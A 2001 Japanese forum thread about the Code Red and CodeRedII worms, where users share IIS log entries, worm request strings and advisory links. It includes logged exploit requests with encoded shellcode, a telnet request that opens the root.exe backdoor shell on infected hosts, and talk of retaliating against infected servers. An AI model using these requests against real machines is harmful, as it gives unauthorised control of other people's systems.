156 :名無しさん@お腹いっぱい。:2001/08/05(日) 02:56
>>148 logを埋めるだけか。サンクス
陰気な国だ

157 :名無しさん@お腹いっぱい。:2001/08/05(日) 03:04
既出かもしれんが、感染対象となるIPアドレスの求め方。
http://www.zdnet.co.jp/help/howto/security/v03-1/index.html

158 :名無しさん@お腹いっぱい。:2001/08/05(日) 03:06
>>157
今日のXはそれともまた違うような気がするんだよな

159 :名無しさん@お腹いっぱい。:2001/08/05(日) 03:10
しかし、DoSアタック行う時期になったらどうすんだ・・・この勢い・・・

160 :名無しさん@お腹いっぱい。:2001/08/05(日) 03:12
初心者だから よくわからないけど、
IISが腐ってるのか それともMSが標的にされてるからあら探しされてるのか どっちなのかな?

161 :即答:2001/08/05(日) 03:13
IISが腐ってます

162 :というより:2001/08/05(日) 03:14
本年度の新人賞をあげたいくらい。
性別で言うとCodeREDは女?若い?

163 :名無しさん@お腹いっぱい。:2001/08/05(日) 03:16
本年度っつーか、モリスワームも超えたんじゃないか

164 :ななしさん:2001/08/05(日) 03:22
>>155 偽造IPなのでは?
おいらが聞いた話では9割偽造だよんって聞いたけどデマ?

165 :名無しさん@お腹いっぱい。:2001/08/05(日) 03:42
>>164
パケットの送信元 IP を偽造したところでルーティングが狂って
TCP のセッションを正しく確立できなくなるだけ (ACK が返っ
てこない)。ルーターに感染するウィルスならまだしも IIS に
感染するウィルスがパケットの IP 偽造はやらんだろ。少なくとも
俺はそんな作業かったるくてやりたくねー。

166 :155:2001/08/05(日) 03:46
どでしょ?
確かにソースアドレス偽造してアタックかけるのは
一般的だと思いますけど、Code Redは攻撃(っていうか感染)
する時に自分のアドレス偽造してるのかなあ?
これも前回のNNNと今回のXXXで違うのかなあ?
どなたか情報もってますか?

Code読んで解析するのが一番早いのでしょうけど
(ちょっと解析仕方わからなくて。。。)

167 :名無しさん@お腹いっぱい。:2001/08/05(日) 03:57
Xのリクエストヘッダは基本的に

GET /default.ida?XXXX(略)%u00=a HTTP/1.0
Content-type: text/xml
Content-length: 3379

って感じだったけど、寝る前にログ見直したら

GET /default.ida?XXXX(略)%u00=a HTTP/1.0
Host: aaa.bbb.ccc.ddd
Content-type: text/xml
Content-length: 3379
Cache-Control: max-stale=0

ってのが出てきた。Hostのアドレスには、俺のIPが入ってた。
ちなみにうちは当然IISなんか立ててない。何故だろうか

で、たった今、210.20.60.198から

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Host: 210.20.60.198
Content-type: text/xml
Content-length: 3379
Cache-Control: max-stale=0

が来た。でかいコピペですまんが、何だこれは?
リクエストメソッドすらないじゃん

168 :名無しさん@お腹いっぱい。:2001/08/05(日) 03:58
まあとにかく、Xって言っても何種類かありそうだね

169 :名無しさん@お腹いっぱい。:2001/08/05(日) 04:04
時間的にレス付かないだろうから寝る。おやすみ

170 :名無しさん@お腹いっぱい。:2001/08/05(日) 04:41
CodeRedアクセスしてくるサーバを、別のセキュリティーホールをついて落としたら、犯罪ですか?
こんなに騒いでるセキュリティホールを塞がない奴だから、きっと他のも対策してないと思うのだが。。

X版の勢いがすごいですね。日本からのアクセスが多いのは何故? 日本産?

171 :厨学生:2001/08/05(日) 04:49

学校のサーバーのログを見てみたら
05/Aug/2001:00:40:00ぐらいから
X版が大量に

172 :がっくす:2001/08/05(日) 06:03
いかんなぁ…ログ見るからに状況がどんどん悪化している気がする。

怠慢な管理者がこれほどまでに多かったとは。

173 :名無しさん@お腹いっぱい。:2001/08/05(日) 07:18
うちも 68%がX版になったよ。

174 :名無し:2001/08/05(日) 08:38
勢いの鈍ったCode Red
http://news.yahoo.co.jp/headlines/sbn/010804/cpt/12290000_zdnet002.html

175 :名無しさん@お腹いっぱい。:2001/08/05(日) 08:50
>>174
事態は刻々と変化しています

176 :名無しさん@お腹いっぱい。:2001/08/05(日) 09:08
>>174
うちは今までに 134 匹来てるよ。
専門家の予測とやらはいつもあてにならんな。

177 :名無しさん@お腹いっぱい。:2001/08/05(日) 09:24
>>174
けさ5時過ぎからでのべ37。お祭り状態です。。。

178 :名無し:2001/08/05(日) 10:16
ゾヌのアラームが今日は一件しかありません。
みんな騒いでるのになぜうちには来ないのでしょうか?
ちなみにプロバイダはゼロです。

179 :名無しさん@お腹いっぱい。:2001/08/05(日) 10:24
>> 174
うちは 169匹です。特に今日は凄いペース。

プロバイダは東京めたりっく通信。

180 :名無しさん@お腹いっぱい。:2001/08/05(日) 10:26
BlackIce、警報鳴りっぱなし

181 :名無しさん@お腹いっぱい。:2001/08/05(日) 10:27
http://www.geocrawler.com/lists/3/SourceForge/4890/0/6330369/

182 :名無しさん@お腹いっぱい。:2001/08/05(日) 10:43
8時ごろから数えて40件ぐらいアタックが来てんだけど、
やっぱコード・レッドのせいですか?
俺さっきからpingうちまくって対抗していたのですが・・・(鬱藁

183 :名無しさん@お腹いっぱい。:2001/08/05(日) 10:47
>>182
多分ね。
言い方を変えるとHTTPポートプローブ。
今、こうやって書いている途中でも警報なるぐらいだから。

184 :名無しさん@お腹いっぱい。:2001/08/05(日) 10:47
90分で42アタックです。
これのせいか知らないけどめちゃくちゃ重いです。

185 :名無しさん@お腹いっぱい。:2001/08/05(日) 10:51
うちは90分で82アタック。殆どバ韓国から。

186 :名無しさん@お腹いっぱい。:2001/08/05(日) 10:58
うちはとうとう200超えたよ。

187 :sage:2001/08/05(日) 11:19
ついに300を超えた。
つーかコレ
211.196.153.19240回以上連続アクセスってどういうこと?
マジでクソIIS、クソ管理者をくたばらせる方法を考えないと・・・

188 :名無しさん@お腹いっぱい。:2001/08/05(日) 11:45
鯖立ててないんだけど8月5日分だけで100超えたっす。
普段なら一日数回なんだけどねぇ。

189 :名無しさん@お腹いっぱい。:2001/08/05(日) 12:20
昨日は前夜祭だったのか。
今日は凄まじく来てるよ。
こんな短文打ってる間に2回来るんだよ。
誰かなんとかしてくれ。

190 :名無しさん@お腹いっぱい。:2001/08/05(日) 12:23
今日の0:00〜12:00の間だけで250回。
すさまじい勢いだ。

191 :初心者:2001/08/05(日) 12:23
>>189
私のところも同じです。
今日は特にひどい・・・
数分に1回は来ますね(藁

192 :名無しさん@お腹いっぱい。:2001/08/05(日) 12:26
>>189
昨日より今日、今日より明日、といった感じで19日まで
はずっと続くんでないかなぁ。

193 :名無しさん@お腹いっぱい。:2001/08/05(日) 12:42
知らずに仕返しにpingを数十万回打ったよ。

194 :名無しさん@お腹いっぱい。:2001/08/05(日) 12:43
何かさ、アドレスの先頭が211.で始まる奴ばっかりから来るんだけど。

Nは小康状態だけど、Xは凄まじいな。

195 :名無しさん@お腹いっぱい。:2001/08/05(日) 12:46
ウチのログはこんな感じで確実に増加してるYO!
ttp://www.geocities.co.jp/SiliconValley-Cupertino/9922/
ウチは自作ISAPIフィルターかましてるので
CodeRedに擬態して接続すれば首吊りモナーAAが拝めるYO(w

196 : :2001/08/05(日) 13:14
8/01 3
8/02 38
8/03 35
8/04 48
8/05 97 (ただし13時まで)
logにホスト名が無い場合が多いので、ISPからのDial-up userが多いと思われる。
このレベルのユーザーにパッチを当てる作業は期待できないので、この問題は
しばらく続くと思う。
次の亜種で、感染したホストがクラッシュするようにでもなれば、そこでユーザ
はやっと気がつくんじゃないの。(そうなった方が、Network上の資源を食いつく
されるのが終るので、ありがたいけど。)

197 :名無し:2001/08/05(日) 13:38
なんか昨日からたくさんきますが未だにCodeRedが一体どういう
ものかが理解できません。。
色々検索して調べてみてはいるのですが、言葉が難しいです。
むちゃくちゃ簡単に言うとどういうものなんでしょうか?

198 :名無しさん@お腹いっぱい。:2001/08/05(日) 13:41
Zoneだからリクエスト見れないんだけど、昨日辺りから
中国語とか日本語が増えてない?
XXXXXの方はJPもヤバイのか、、ほぼ2、3分おきにノックされて
作業出来ないよ  (鬱

199 :なー:2001/08/05(日) 13:43
ログをみてびっくり。殆どXXXだ(爆
0時-12時で112件。
NNNは方々から来るがXXXは210.*.*.*からしか来ないぞ。
うちの鯖が210.*.*.*だからか?
どうやら同じ第一オクテットのIPにだけ送出するようだな。
手当たり次第に打つよりは感染の打率は上がるわな。考えたね。

200 :なー:2001/08/05(日) 13:47
>>197
ワームだよ。サーバのバグを利用してサーバ同士に伝言ゲームをやらせる。
「この台詞と同じ台詞を多くのサーバに伝えろ」って感じ。どお?

201 :名無しさん@お腹いっぱい。:2001/08/05(日) 13:53
>>200
うまいね。で、穴のあるIISは伝言ゲームに
参加するってわけ。穴のないヤツは無視する
けど伝言ゲームのお誘いのメッセージはログ
にちゃんと残っているから、プロバイダに
報告するとイイかも。

202 :名無しさん@お腹いっぱい。:2001/08/05(日) 13:55
ちょっと実験してみたら感染してるやつは殆ど01-025も放置しとる(;´Д`)
ああああああああああああああ〜〜〜

203 :名無しさん@お腹いっぱい。:2001/08/05(日) 13:56
Hacked by chineseってindexの中華鯖 ┐(´ー`)┌
なんだかなぁ・・・

204 :名無しさん@お腹いっぱい。:2001/08/05(日) 13:59
確かにすごい数だね。
うち2〜30回/分位きてる。
この位、WEBにアクセスがあると、
頑張ってWWWも書くんだけどなあ。

205 :名無しさん@お腹いっぱい。:2001/08/05(日) 14:05
最初びびったけど、原因が分かったら気にならなくなった。
だけど、これから、まだ増えるんだろうねえ。特に盆休みが
始まるから対策が遅れそう。
つーか、サーバー立ててる奴、管理してる奴、もちっと、
しっかりしてくれよ。

206 :名無しさん@お腹いっぱい。:2001/08/05(日) 14:11
http://www.incidents.org/ に NNN タイプと XXXタイプの違いが報告されている。
XXXタイプはバックドアを仕掛けていくらしいぞ。

207 :名無しさん@お腹いっぱい。:2001/08/05(日) 14:12
やられちゃったヤツって、わざわざM$に
お金払ってまでして何やってるんだろうね。
Linux+Apacheならタダ同然でCode Redも
関係ないのに。

208 :名無しさん@お腹いっぱい。:2001/08/05(日) 14:13
レンタルサーバー借りてて昨日から変なアクセスログ&エラーログが
CodeRedとかいうワームのせいだったのか・・。
昨日の深夜から今も。2分おきぐらい。61からはじまるのが
多いです。

209 :名無しさん@お腹いっぱい。:2001/08/05(日) 14:13
こういうのは、相手の管理者に連絡してあげたほうが
親切なのかな?

210 :名無しさん@お腹いっぱい。:2001/08/05(日) 14:16
Linux+Apacheに乗り換えたら、システム管理の仕事が減ってしまい、
残業と休日出勤が無くなる上に、UNIXわからないからシステム管理者の
抵抗が激しいです。

211 :名無しさん@お腹いっぱい。:2001/08/05(日) 14:21
>>210
だからよ、そうやって残業代と休日出勤手当てをあてにするから、
この業界はいつまでたってもだめなんだYo!
残業や休日出勤するヒマがあったら、勉強してくれ。
話がそれたのでsage

212 :名無しさん@お腹いっぱい。:2001/08/05(日) 14:28
>210
ApacheのほうがIISほどパッチ当てるの簡単ではないので
Apacheに感染するCodeREDタイプのワームが出現したら
今回の比ではないくらい繁殖してしまうのでは。
いまでも古いままのApache使ってるサイトは非常に多いです。
# ちなみにUNIXわからないシステム管理者ってなに管理してるんすか?

213 :名無しさん@お腹いっぱい。:2001/08/05(日) 14:29

GUIから操作できる“統合化された”MSの製品って、
確かにとっつきやすいよね。
でも、とっつきやすさが大切なのは初心者だけ。

プロにとっては、スクリプトで操作したり、単機能な
製品やコマンドを組み合わせた方が簡単快適で作業も高速。

少し勉強するだけで、MSの統合化された製品(バグと
制限事項だらけ)から開放され、快適な世界で仕事が出来
るんだけどな。

会社が労働時間(どれだけ働いたか)で給料を払っている
うちは、早く仕事を終わらせても評価されないからだめかな。

そういう会社は、早く淘汰されてください(わら)
ITバブル崩壊マンセー。

214 :名無しさん@お腹いっぱい。:2001/08/05(日) 14:33
>> 212

ハア?

どこが難しいんだよ。

IISはパッチあてると動かなくなるソフトが怖いから検証が大変だぞ。

その点、Apache は独立性が高いから問題は起きにくい。

215 :名無しさん@お腹いっぱい。:2001/08/05(日) 14:35
>>208
うちも61からはじまるのばっかデス。
一週間ぐらいまえにZAいれたばかりなので・・・
って書いてるあいだに2回もきた。。

216 :名無しさん@お腹いっぱい。:2001/08/05(日) 14:41
>いまでも古いままのApache使ってるサイトは非常に多いです

管理者が何もしないという理由の場合も多いが、
たいていは古いままでも問題ないからだろ。

セキュリティホールがたまに発見されても、
IISみたいに致命的なものは非常に稀だ。
関係ないホールだったら、放置したって良いし。

最新パッチの追っかけをしなきゃいけないのは、
MSソフト全て,sendmail,DNS,wu-ftpd くらいなもの。

217 :名無しさん@お腹いっぱい。:2001/08/05(日) 14:42
>>215 >>208
自分のIPも61で始まってませんか?

218 :なー:2001/08/05(日) 14:44
>>212
メールの覗き見だよ。

219 :なー:2001/08/05(日) 14:46
>>216
あー。BIND古いままだー。

220 :名無しさん@お腹いっぱい。:2001/08/05(日) 14:46
>>218
なーるほど

221 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:01
>>214
検証しなきゃいけないようなクリティカルなサイトでは
Apacheだって同様に試験しなきゃいけないんでは?
mod_xxxxとかくっつけてると特に。
個人サイトとかならIISはパッチのexeファイルを実行して
再起動するだけなんだからラクチンでしょ

222 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:06
>> 221
どこが入れ替わるのかわかるので全部の試験はしないだよ。
(もちろん暇なおじさんが沢山いるならご自由に)

apache だってインストールはコマンド一発じゃん。
マシンの再起動だっていらん。

223 :なー:2001/08/05(日) 15:07
ちなみにウイルスの作者は死刑になるらしいぞ(藁
http://www.zdnet.co.jp/news/0107/25/e_coursey.html

224 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:08
>>217
208です。レンタルサーバーのIPが61のようです。

225 :なー:2001/08/05(日) 15:08
>>221-222
どっちだっていいよ。
いずれにせよパッチを充てない管理者はドキュソ。異議ある?

226 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:11
>> 222
mod_sslとかrpm版にはついてないっしょ
ついてるのあっても更新遅いし。
リコンパイルいるっすよ
ヘタしたらconfファイル書き直し。

227 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:11
自分と同じプロバイダのダイヤルアップマシンから来ちまったよ。
自宅マシンにサーバなんか立てないで、プロバイダから提供され
てるスペースを使えばいいのによー。

これだけ広まってしまったのって、ダイヤルアップする自宅マシン
に無防備にサーバを立ててしまうユーザが多いのが原因の一つ
だと思う。

228 :なー:2001/08/05(日) 15:12
XXXのダンプリスト。
http://www.incidents.org/diary/diary.php
CodeRedIIとの文字が読み取れるけど。だれか解読してみ。

229 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:14
>>221
Debianでaptをcronで回しておけばほぼ自動で最新のパッケージに
保てるからこっちの方が楽じゃない? 穴が見つかってもたいてい
1〜2日くらいでバグフィックスしたのが上がってくるっていうし。
自分はVineなのでちょとDebianがうらやましいナー。

ところでMSのパッチってあてた後再起動しなきゃダメなの?

230 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:14
>>225
激しく同意!何使ってようが管理者次第。
運用に金かけないDQN会社も多ければ、有能な人材不足も原因の一つ。

231 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:16
>>225
今回のCodeREDは管理者という意識のない
ダイアルアップユーザやADSLユーザがかなり多いように思います。
IP見てると。
IISインストールしたことさえ憶えてないとか、気づいてないとか。
そういうひとはセキュリティ関係のサイトなんか読まないから
CodeREDの存在自体しらないし、パッチって何?って感じでは?
せめてWindowsUpdateでパッチが当たるようにして欲しいっす。

232 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:17
>> 225

たしかにドキュソだね。

特に今回の件は、前もってずいぶん広報されてたのにね。

ひょっとして、
「MSのパッチは完璧ではなく、特定の条件下でしか意味がない」
というオチだったら欝だね。

Exchange 2000 の時だって、3回くらい出し直したからね。
http://www.zdnet.co.jp/news/0106/14/e_patch.html

233 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:19
>>225
同意。IISだってメンテしているところは平気だし。
>>226
リコンパイルっていってもmake,make installで
済む話じゃないの? つーか、tar玉拾ってきて
makeもできないヤツがUNIXの管理なんかするな。

234 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:19
>>229
Hotfix一つ当てるたびにいちいち再起動しなきゃダメなんす。
ぐはっ

235 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:20
http://www.jpcert.or.jp/at/2001/at010018.txt

>公開されているパッチは、Windows NT 4.0 の場合は Service Pack 6a、ま
>た Windows 2000 の場合は Service Pack 1 または Service Pack 2 に対する
>パッチです。したがってパッチを適用する前に、あらかじめ該当する Service
>Pack をシステムにインストールしておく必要があります。

> Service Pack のインストールが不可能もしくは極めて困難な場合は、一時
>的な対応策として、IIS における .ida および .idq のスクリプトマッピング
>を削除することをお勧めします。しかしこの対応方法では、関連するソフトウェ
>アをインストールすることでこの関連付けが復元されてしまうことがあります
>のでご注意ください。

236 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:22
>>233
Apacheのコンパイルもしたことないの?
ださっ

237 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:22
>>228
ざっと眺めただけでも怖いねー。
d:\inetpub\scripts\root.exe ってのが起動されるね。
こやつは何者なんだろ。

238 :237:2001/08/05(日) 15:25
レジストリもいじってるみたいだね。こわー。

239 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:27

>> 237

バックドアで使用するルートキットだったりするんじゃないか。
CodeRedII(タイプX)では、感染したマシンをリモートから
操作できるそうだし。

240 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:33
>>236
Slackwareの頃はtar ball拾ってきてはがしがし
makeしてたけど、rpmを使うようになってからは
パッケージを拾って済ますほうが多いな。

もちろん必要ならsrc.rpmをいじってrebuildとか、
tar ballをmakeして/usr/localにぶち込むよ。
ダサイのは否定できないけどね。

241 :167:2001/08/05(日) 15:37
あれ、関連情報全然でてない・・・・・・鬱だ

242 :なー:2001/08/05(日) 15:38
どーでもいいけど、OSの張り合いはOS板に逝ってね。
http://mentai.2ch.net/os/index2.html

243 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:39
>>228

>> 82 >>84 >>106に怪しげな記述はリストアップしてあるよ

244 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:41
/scripts に cmd.exe と root.exe がコピーされちゃうのかな?
んで、

% telnet <host> 80
GET /scripts/root.exe HTTP/1.0

でコマンドプロンプトが起動しちゃうわけか・・・
うー、こわひ・・・

245 :なー:2001/08/05(日) 15:44
>>244
ん?するとXXXなホストにtelnetするとrootに昇格?(藁
それは怖い。で?パスワードは?

246 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:46
rootって・・・

247 :244:2001/08/05(日) 15:47
>>245
いや、こうなるらしいのでパスワードも何もあったもんじゃないかと。
-----------------------------------------------------
GET /scripts/root.exe HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 04 Aug 2001 20:35:19 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

c:\inetpub\scripts>
-----------------------------------------------------

248 :名無しさん@お腹いっぱい。:2001/08/05(日) 15:53
>>247
ああ、>>228にばっちり書いてあるね。
俺の偽HTTPDの応答それに書き換えとこ(w

249 :名無しさん@お腹いっぱい。:2001/08/05(日) 16:00
>>167みたいなのが来た人はいないの?まあApacheのアクセスログ
だけじゃ、Cache-Control: max-stale=0 このヘッダが付いてるだけの
やつはわからないだろうけど、リクエストメソッド無しの奴は来てない?

250 :名無しさん@お腹いっぱい。:2001/08/05(日) 16:08
スレのタイトルを「CodeRedIIは怖い!」に変更した方がいいな。(ニガワラ

251 :名無しさん@お腹いっぱい。:2001/08/05(日) 16:10
まあ怖いっつーか、このスレにいる人間はIISなんか
使ってないから怖くないんだけどね。「アホ管理者が怖い!」
の方が的確だな。もしくは「FW厨が怖い!」

252 :名無しさん@お腹いっぱい。:2001/08/05(日) 16:11
NNNタイプは本日11回
XXXタイプは本日119回
リクエストメソド無し 0回

253 :なー:2001/08/05(日) 16:12
>>249
来てるよ。1時間に1匹くらい。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=993901491&st=269&to=269&nofirst=true

254 :249:2001/08/05(日) 16:15
>>252-253
サンクス。またでかいコピペで悪いんだけど(ログそのまま)

[Sun Aug 5 06:40:48 2001]
Access from h75-210-68-140.seed.net.tw(210.68.140.75) : 2327
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090
%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1
Host: 210.68.140.75
Connection: keep-alive
Content-type: text/xml
Content-length: 3379
Via: 1.0 nc (NetCache NetApp/5.1)
X-Forwarded-For: 210.68.177.194

こんなのも来てた。プロクシ経由かい

255 :名無しさん@お腹いっぱい。:2001/08/05(日) 16:17
>>251
「DoSアタック期が本気で怖い!」の方がいいよ。

256 :名無しさん@お腹いっぱい。:2001/08/05(日) 16:24
つまり今確認されてるXは、

・ノーマル
・Hostのところにアクセス先IP
・Hostのところにアクセス元IP、リクエストメソッド無し

の三種類かな。他の奴が来た人いる?下の2種類は数が
少ないからログにも残りにくいと思うけど

257 :名無しさん@お腹いっぱい。:2001/08/05(日) 16:26
>>254
さりげなくそいつだけHTTP1.1だね

258 :256:2001/08/05(日) 16:28
失敬。>>256の下二つは、リクエストヘッダに

Cache-Control: max-stale=0

が追加される。

259 :名無しさん@お腹いっぱい。:2001/08/05(日) 16:30
>Hostのところにアクセス先IP
2種類あるみたい。
律儀にHTTP/1.0の前のブランクを2つ→1つに修正してるのは同じ。
でもHTTP/1.0版とHTTP/1.1版の2種類を確認。
リクエストメソッド無しはまだ見た事無い。

260 :名無しさん@お腹いっぱい。:2001/08/05(日) 16:32
>>259
ああ、そんなのがあるんだ。
ブランク2つは俺も気になってたよ(w

261 :なー:2001/08/05(日) 16:43
日本の企業から大量に来てるんだけど知らせてやったほうがいいかな?
いっそ放って置くべき?どう思う?(藁

262 :名無しさん@お腹いっぱい。:2001/08/05(日) 16:46
知らせられるなら知らせるべき、DoSアタック期が怖い

263 :名無しさん@お腹いっぱい。:2001/08/05(日) 16:54
http://ton.2ch.net/test/read.cgi?bbs=sec&key=993901491&ls=50
で公開

264 :なー:2001/08/05(日) 16:56
>>262
じゃあ日本らしいIP列挙するからメールしてくれる?
ワシは日本語苦手だからパス。

265 :名無しさん@お腹いっぱい。:2001/08/05(日) 16:58
>>264
自分でやれや

266 :名無しさん@お腹いっぱい。:2001/08/05(日) 16:58
>>264
つーか列挙コピペもやめろ

267 :名無しさん@お腹いっぱい。:2001/08/05(日) 17:01
XXXタイプのアタックをしてくるサイトは、Code Red2に感染しているわけ
だから、そのIPを2chにコピペすれば凄くマズイと思うけど。

268 :名無しさん@code red:2001/08/05(日) 17:05
Korea Network Information CenterのSUPER COMPUTERから6回きたよ
全然SUPERじゃないな(藁

269 :名無しさん@お腹いっぱい。:2001/08/05(日) 17:06
ワラタ

270 :なー:2001/08/05(日) 17:08
code redセミナー。無料だとさ。誰か逝け。
http://www.nai.com/japan/seminar/codered.asp

271 :名無しさん@お腹いっぱい。:2001/08/05(日) 17:12
>>270

> このウイルスについて「PCウイルスである」「メールを開いただけで感染」
> など、誤った情報が報道されている場合があります。本セミナーで、
> Code Red ウイルスとはどのようなウイルスであるか、正しい情報を
> 認識して下さい。

・・・まあ無料だろうな

272 :名無しさん@お腹いっぱい。:2001/08/05(日) 17:13
日本ではマウンテンデュー code red 売らないのかな?
USではバカ売れらしいけど。

273 :なー:2001/08/05(日) 17:19
NNNの逆汗リスト。
http://www.eeye.com/html/advisories/codered.zip

274 :名無しさん@お腹いっぱい。:2001/08/05(日) 17:21
>>261
自分の使っているプロバイダのほかのユーザからCode Redの
アタックを受けているっていうのをプロバイダのサポートに
連絡したら、ログファイルは警察やIPAに提出してくれないと
そのユーザに対して措置をとれないっていわれたよ。いいのか、
こんなんで>プロバイダ

275 :名無しさん@お腹いっぱい。:2001/08/05(日) 17:24
transnt.ylhcc.gov.tw - - [05/Aug/2001:10:49:46 +0900]
台湾政府機関? X 型。

276 :名無しさん@お腹いっぱい。:2001/08/05(日) 17:24
もっとマスコミに派手に騒いでもらわないと。
バックドア仕掛けられて好き放題されるよってこととか。
でもマスコミはそれをインターネット自体の悪い面として報道しちゃうんだろうな・・

277 :名無しさん@お腹いっぱい。:2001/08/05(日) 17:24
>>274
そういうドキュソプロバイダの名前晒してくれ。

278 :276:2001/08/05(日) 17:25
しまったスレ違い

279 :名無しさん@お腹いっぱい。:2001/08/05(日) 17:26
しかし・・・確実にロバート・タッパン・モリスのワームも超えたな

280 :名無しさん@お腹いっぱい。:2001/08/05(日) 17:32
>>274
俺もJ-COMにちくるつもりだけど、鯖禁止をうたっている
以上、そのユーザーに対して措置取らなかったら殺す。
つってもメールで注意ぐらいだろうな・・・アホJ-COMだし・・

281 :名無しさん@code red:2001/08/05(日) 17:41
code redうざいからってノートンとか黒氷切るのはやめたほうがいいよ
紛れて覗いてるやつもいるから
あー、しょーもな・・・

282 :名無しさん@お腹いっぱい。:2001/08/05(日) 17:42
うーむ、どこのプロバイダもトップページにcode redについて
何にも記述してませんね。
意識低すぎ。
土日だから更新できないのかな?

283 :名無しさん@お腹いっぱい。:2001/08/05(日) 18:03
>> 282

本当にノンキだよね。
プロバイダーもマスコミも。

284 :名無しさん@お腹いっぱい。:2001/08/05(日) 18:25
しかし、hacked by Chinese!ってなってるページは見れないなあ。

285 :名無しさん@お腹いっぱい。:2001/08/05(日) 18:32
>>284 そうだな、これだけ来てる割に 80 ポート叩いても何も起きん
IP ばっかなんだけど、どういうこと?

286 :名無しさん@お腹いっぱい。:2001/08/05(日) 18:42
ワーム配付に忙しくて80に応答出来ないのでは?

287 :名無しさん@お腹いっぱい。:2001/08/05(日) 18:53
一箇所から10回連続ってのがあった。
これも新種だろうか。

288 :名無しさん@お腹いっぱい。:2001/08/05(日) 18:58
いくらなんでもモー少し騒然とした感じが伝わる報道があっていいと
思うんだが・・。マスコミの皆様今回は静かだなぁ。日曜だから
体勢が整わないってのもあるのかな?

289 :名無しさん@お腹いっぱい。:2001/08/05(日) 19:00
実質的にはトラフィックが増えるってだけなんでそれほど重要視されてないのかな。

290 :名無しさん@お腹いっぱい。:2001/08/05(日) 19:03
>>284
新種はWebページ変えないのでは?

291 :名無しさん@お腹いっぱい。:2001/08/05(日) 19:04
>>287
うちにも連続18回つーのがあったぞついさっき
1秒間に2〜6回きとる
こんなヤツが増殖したらかなわん。かんべんしてくれよぉ〜

292 :名無しさん@お腹いっぱい。:2001/08/05(日) 19:06
XXXバージョンって頭固定って事はアジア限定なのかな。

293 :名無しさん@お腹いっぱい。:2001/08/05(日) 19:06
IISをアンインストールしました(;´Д`)

294 :名無しさん@code red:2001/08/05(日) 19:07
なに気に静かになったな・・・

特定のipには来ないのか?

295 :名無し:2001/08/05(日) 19:09
朝から何も来ないのですが・・・・

296 :名無しさん@お腹いっぱい。:2001/08/05(日) 19:10
>>295
そのうち来るから、安心しろ!

297 :名無しさん@お腹いっぱい。:2001/08/05(日) 19:11
>> 288

MS が圧力をかけて隠すって事は無いよね?
20世紀にはよくあった事だけど。

298 :名無しさん@お腹いっぱい。:2001/08/05(日) 19:16
変種は期間限定らしいぞ。
24h 又は 48h の間繁殖した後、トロイ仕掛けて寝るんだとさ。

299 :名無しさん@お腹いっぱい。:2001/08/05(日) 19:17

>> 292

うちにきているので、タイプN(CodeRedII)は、

61.XXX.XXX.XXX: 162回
62.XXX.XXX.XXX: 1回
208.XXX.XXX.XXX: 1回
210.XXX.XXX.XXX: 2回
211.XXX.XXX.XXX: 8回

おれの IP は、61.202.XXX.XXX です。

感染先を探すロジックが大幅にかわったらしい。

300 :なー:2001/08/05(日) 19:25
>>299
分かり難いから61.*.*.*って書いてね。

301 :名無しさん@お腹いっぱい。:2001/08/05(日) 19:25
>>298
トロイっつーかバックドアね

302 :名無しさん@お腹いっぱい。:2001/08/05(日) 19:25
これ読むよろし
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0108&L=ntbugtraq&F=P&S=&P=279

303 :名無しさん@お腹いっぱい。:2001/08/05(日) 19:28
>>302
なるほど

304 :ななし:2001/08/05(日) 19:29
送信元を探っていて改ざんされてるページ発見
http://210.96.220.7/

このバックドアの作り方だとsadmindと同じ方法で改ざんできちゃう
もんね。

305 :名無しさん@お腹いっぱい。:2001/08/05(日) 19:29
俺んとこに来てるのは9割方210.x.x.xだよ。
消しても消しても警告が来る。まぁ鯖立てて無いから直接は無害なんだろうけど。

306 :名無しさん@お腹いっぱい。:2001/08/05(日) 19:30
>>301
そのとうりっす。恥ずいな俺。
こんな時は、打つだし脳とか言わんといかんか?

307 :名無しさん@code red:2001/08/05(日) 19:34
既出かもしれないが

http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html

鯖立ててるのは見よ!

308 :名無しさん@お腹いっぱい。:2001/08/05(日) 19:37
>>307
「8月3日現在、Code Red に感染したという報告はIPAには2件しかありません」
笑える。

309 :名無しさん@code red:2001/08/05(日) 19:39
>>308

だな

310 :名無しさん@code red:2001/08/05(日) 19:44
